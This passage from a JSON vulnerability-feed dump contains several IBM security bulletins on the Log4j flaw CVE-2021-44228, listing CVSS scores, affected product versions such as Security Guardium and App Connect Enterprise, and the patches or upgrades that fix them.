"MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T08:33:49", "id": "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "href": "https://www.ibm.com/support/pages/node/6526220", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:31", "description": "## Summary\n\nLog4j is used by IBM Cloud Pak for Data System 2.0 in openshift-logging. This bulletin provides a remediation for the reported Apache Log4j vulnerability, CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \n \nIBM Cloud Pak for Data System 2.0 -\n\nOpenshift Container Platform 4\n\n| 2.0.0.0 - 2.0.1.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by applying following remediation \n**\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 2.0 - Openshift Container Platform 4\n\n| 1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132 | [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=1.0.0.0-openshift-4.6.log4j-WS-ICPDS-fp132&source=SAR&function=fixId&parent=ibm/WebSphere>) \n \n**Please follow the steps given in [release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/2.0?topic=20-log4j-vulnerability-patch> \"release notes\" ) to apply above remediation.**\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5FPD\",\"label\":\"IBM Cloud Private for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"IBM Cloud Private for Data System 2.0 - All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T11:35:02", "type": "ibm", "title": "Security Bulletin: Log4j vulnerability affects IBM Cloud Pak for Data System 2.0", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2022-01-19T11:35:02", "id": "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "href": "https://www.ibm.com/support/pages/node/6527310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:55", "description": "## Summary\n\nIBM Security Guardium has fixed this vulnerability \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Guardium| 10.5 \nIBM Security Guardium| 10.6 \nIBM Security Guardium| 11.0 \nIBM Security Guardium| 11.1 \nIBM Security Guardium| 11.2 \nIBM Security Guardium| 11.3 \nIBM Security Guardium| 11.4 \n \n## Remediation/Fixes\n\nProduct| Versions| Fix \n---|---|--- \nIBM Security Guardium| 10.5| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p546_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p546_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 10.6| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p684_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=Linux&function=fixId&fixids=SqlGuard_10.0p684_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.0| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p41_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p41_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security 
Guardium| 11.1| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p151_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p151_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.2| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p264_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p264_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.3| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p346_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p346_CVE-2021-44228&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.4| 
[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p404_CVE-2021-44228&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=Linux&function=fixId&fixids=SqlGuard_11.0p404_CVE-2021-44228&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication \n16 Dec 2021: Second Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"10.5, 10.6, 11.0, 11.1, 11.2, 11.3, 11.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T20:46:58", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is vulnerable to a remote code execution vulnerability in log4j2 component", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], 
"modified": "2021-12-16T20:46:58", "id": "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "href": "https://www.ibm.com/support/pages/node/6527082", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:45", "description": "## Summary\n\nApache Log4j vulnerability associated with the Rational Performance Tester Apache JMeter\u2122 Test Extension impacts Rational Test Automation Server. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nRational Test Automation Server\n\n| Versions 10.0, 10.1, 10.2 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n \nCustomers with Rational Test Automation Server upgrade to version 10.2 then upgrade to version 10.2.1.1 from the entitlement registry\n\nInstructions for pulling upgraded images:\n\n * Installing on Ubuntu: <https://help.blueproddoc.com/rationaltest/rationaltestautomationserver/10.2.1/com.hcl.test.server.admin.doc/topics/t_install_ubuntu.html>\n * Installing on Red Hat OpenShift: <https://help.blueproddoc.com/rationaltest/rationaltestautomationserver/10.2.1/com.hcl.test.server.admin.doc/topics/t_install_openshift.html>\n\nNote: Although the Apache Log4j libraries installed with the Apache JMeter Test Extension are not loaded by Rational Test Automation Server, the presence of Log4j-core-2.11 may impact customers.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n27 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6QK3\",\"label\":\"IBM Rational Test Automation Server\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF031\",\"label\":\"Ubuntu\"},{\"code\":\"PF043\",\"label\":\"Red Hat\"}],\"Version\":\"10.0, 10.1, 10.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T10:42:18", "type": "ibm", "title": "Security Bulletin: Rational Test Automation Server is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2022-01-15T10:42:18", "id": "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "href": "https://www.ibm.com/support/pages/node/6541184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:06", "description": "## Summary\n\nLog4J is used by IBM App Connect Enterprise Certified Container for logging when generating a bar file that contains a JDBC connector and when running a flow that contains a JDBC connector. IBM App Connect Enterprise Certified Container Designer Authoring operands and Integration Server operands that use the JDBC connector may be vulnerable to remote code execution due to CVE-2021-44228. This bulletin provides patch information to address the reported Log4j vulnerability (CVE-2021-44228).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 1.1-eus with Operator \nApp Connect Enterprise Certified Container| 1.4 with Operator \nApp Connect Enterprise Certified Container| 1.5 with Operator \nApp Connect Enterprise Certified Container| 2.0 with Operator \nApp Connect Enterprise Certified Container| 2.1 with Operator \nApp Connect Enterprise Certified Container| 3.0 with Operator \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the operator and any DesignerAuthoring and IntegrationServer operands .\n\n**App Connect Enterprise Certified Container 1.4, 1.5, 2.0, 2.1 and 3.0 (Continuous Delivery)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 3.1.0 or higher, and ensure that all DesignerAuthoring and IntegrationServer components are at 12.0.3.0-r1 or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_cd?topic=releases-upgrading-operator>** \n**\n\nAlternatively you can update the operator version to 3.0.0 or higher, then apply a set of iFix images for the DesignerAuthoring and IntegrationServer operands. Instructions on upgrading the Operator and applying the iFix images for the Continuous Delivery release are available at <https://www.ibm.com/support/pages/node/6527178>\n\n**App Connect Enterprise Certified Container 1.1 EUS (Extended Update Support)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 1.1.5 or higher, and ensure that all DesignerAuthoring and IntegrationServer components are at 11.0.0.15-r1-eus or higher. 
Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_eus?topic=releases-upgrading-operator>\n\nAlternatively you can update to Operator version 1.1.4 or higher, then apply a set of iFix images for the DesignerAuthoring and IntegrationServer operands. Instructions on upgrading the Operator and applying the iFix images for the Continuous Delivery release are available at <https://www.ibm.com/support/pages/node/6527180>\n\n_Note: For other versions prior to 1.4 IBM strongly recommends upgrading to a supported level and following the instructions above for the Continuous Delivery versions_\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee <https://www.ibm.com/support/pages/node/6239294> for information supported levels of the ACE Certified Container Operator\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDR5J\",\"label\":\"IBM App Connect Enterprise\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.4, 1.5, 2.0, 2.1, 3.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T13:23:43", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container Designer Authoring operands and Integration Server operands that use the JDBC connector may be vulnerable to remote code execution due to CVE-2021-44228", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-31T13:23:43", "id": "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "href": "https://www.ibm.com/support/pages/node/6527794", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:47:37", "description": "## Summary\n\nIBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nOEM partner ThycoticCentrify, after conducting extensive research of its product code base, has determined that **none** of the products outlined below use the vulnerable Java library `log4j` with the JNDI exploit (CVE-2021-44228). Additionally, **none** of the products outlined below are built on the Java programming language, so the library cannot be present.\n\n * IBM Security Verify Privilege Vault\n * IBM Security Verify Privilege Manager\n * IBM Security Verify Privilege Account Lifecycle Manager\n * IBM Security Verify Privilege Behavior Analytics\n * IBM Security Verify Privilege DevOps Vault\n * IBM Security Verify Privilege Vault Remote\n * IBM Security Verify Privilege Server Suite\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nhttps://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS2N2U\",\"label\":\"IBM Security Verify Privilege\"},\"ARM Category\":[],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:37:26", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:26", "id": "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "href": "https://www.ibm.com/support/pages/node/6525770", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:16", "description": "## Summary\n\nThere is a vulnerability in the version of Apache Log4j that was included in Cloud Pak for Data. This issue has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
